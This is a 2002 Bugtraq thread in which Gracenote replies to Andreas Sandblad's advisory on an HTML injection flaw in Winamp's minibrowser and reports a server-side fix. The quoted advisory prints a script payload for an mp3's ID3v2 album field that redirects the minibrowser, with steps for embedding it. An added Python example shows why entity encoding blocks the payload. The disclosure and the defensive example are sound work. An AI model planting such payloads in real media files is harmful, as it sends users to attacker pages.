[24953] in bugtraq
Re: Winamp: Mp3 file can control the minibrowser
daemon@ATHENA.MIT.EDU (Security)
Wed Apr 3 21:18:52 2002
Message-ID: <200204031449070332.4CE9423E@cracker.globix-sc.cddb.com>
In-Reply-To: <Pine.LNX.4.44.0204031321420.11204-100000@mao.acc.umu.se>
Date: Wed, 03 Apr 2002 14:49:07 -0800
Reply-To: security@gracenote.com
From: "Security" <Security@gracenote.com>
To: "Andreas Sandblad" <sandblad@acc.umu.se>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Thank you for your posting of a Cross-Site Scripting issue with the mini-browser that is included with Winamp 2.78 and above. Gracenote supplies the underlying technology for the mini-browser. We have fixed the encoding issue at the server. Should you find any additional security issues with the mini-browser, please send email to security@gracenote.com.
Thanks to Andreas Sandblad for bringing this to our attention.
Matthew Leeds
VP Operations
Gracenote
www.gracenote.com
*********** REPLY SEPARATOR ***********
On 4/3/2002 at 1:23 PM Andreas Sandblad wrote:
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>Title: Winamp: Mp3 file can control the minibrowser
>Date: [2002-04-3]
>Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
>Impact: A special crafted mp3 file can control the
> minibrowser, such as directing to arbitrary
> webpage possibly containing malicious
> html code. Also another "call home" issue.
>Status: Winamp contacted over two weeks ago,
> no response.
>Vendor fix: None. The fix should be on the server side.
>Workaround: Disable minibrowser. _ _
> (enabled by default) o' \,=./ `o
>Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
>---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
>
>PROBLEM:
>Winamp has a built-in minibrowser to show information about songs being
>played (enabled by default). For every song currently playing Winamp will
>direct the minibrowser to a URL like
>http://info.winamp.com/winamp/WA.html?Alb=&Art=Love Project&Cid=winamp&Tid=&Track=Brick
>Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
>the mp3 file. The problem is that the html page doesn't filter "<" and ">"
>characters making it possible to inject html code to control the
>minibrowser (yet another CSS problem).
>
>EXPLOIT:
>Every field in the ID3v1 tag is limited to max. 32 bytes so we use the
>ID3v2 tag instead. It seems that Winamp has made some useless efforts to
>stop our attack, namely to convert " and ' to \" and \' (server side).
>This will of course not stop us.
>
>So let's put the following html code in the album field of the ID3v2 tag of
>our mp3-file:
><mp3 id=m src=http://ANYURL><script>location=m.src</script>
>It will direct the user to http://ANYURL on load.
>
>Adding an ID3v2 tag to an mp3 file is very simple. Open the file in Winamp,
>right click on it and choose "File info". Unmark the ID3v1 tag and mark
>ID3v2. Add the html code in the album field. Sometimes Winamp will
>complain when creating the ID3v2 tag with some characters. Then you simply
>have to hexedit the mp3 file instead.
>
> _ _
> o' \,=./ `o
> (o o)
>---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
>Andreas Sandblad, student in Engineering Physics
>at the University of Umea, Sweden.
>---------------------------------------------------------------
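The server-side fix Gracenote mentions and the "quotes only" escaping the advisory criticises, contrasted in an added example that is not Gracenote's or Winamp's code: a constructed WA.html-style page is built from the Alb/Art/Track query parameters, once with backslash-escaped quotes and once with full HTML entity encoding, using the album payload quoted in the advisory as input (the page layout and helper names are assumptions).

```python
# Added example, not Gracenote's or Winamp's code: shows why escaping only
# quotes does not stop the ID3 tag injection, while entity-encoding the
# tag fields before they reach the minibrowser page does.
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Album-field payload quoted in the advisory.
ADVISORY_PAYLOAD = '<mp3 id=m src=http://ANYURL><script>location=m.src</script>'


def weak_escape(value: str) -> str:
    """The server behaviour the advisory describes: only " and ' are
    backslash-escaped, so < and > pass straight into the page."""
    return value.replace('"', '\\"').replace("'", "\\'")


def safe_escape(value: str) -> str:
    """Entity-encode every HTML metacharacter (<, >, &, ", ')."""
    return escape(value, quote=True)


def build_url(album: str, artist: str = 'Love Project', track: str = 'Brick') -> str:
    """Constructed URL in the shape the advisory quotes, tag fields as query params."""
    return 'http://info.winamp.com/winamp/WA.html?' + urlencode(
        {'Alb': album, 'Art': artist, 'Cid': 'winamp', 'Tid': '', 'Track': track})


def render_page(url: str, escaper) -> str:
    """Assumed page template: each tag field is passed through `escaper`
    and placed in the HTML body, as the info server would do."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)

    def field(key: str) -> str:
        return escaper(params.get(key, [''])[0])

    return (f"<html><body>Artist: {field('Art')}<br>"
            f"Album: {field('Alb')}<br>Track: {field('Track')}</body></html>")


def markup_survives(page: str) -> bool:
    """True when a raw tag from the payload made it into the rendered page."""
    return '<script' in page or '<mp3' in page


if __name__ == '__main__':
    url = build_url(ADVISORY_PAYLOAD)
    for name, esc in (('quotes-only', weak_escape), ('entity-encoded', safe_escape)):
        page = render_page(url, esc)
        print(f"{name}: {'markup survives' if markup_survives(page) else 'neutralised'}")
```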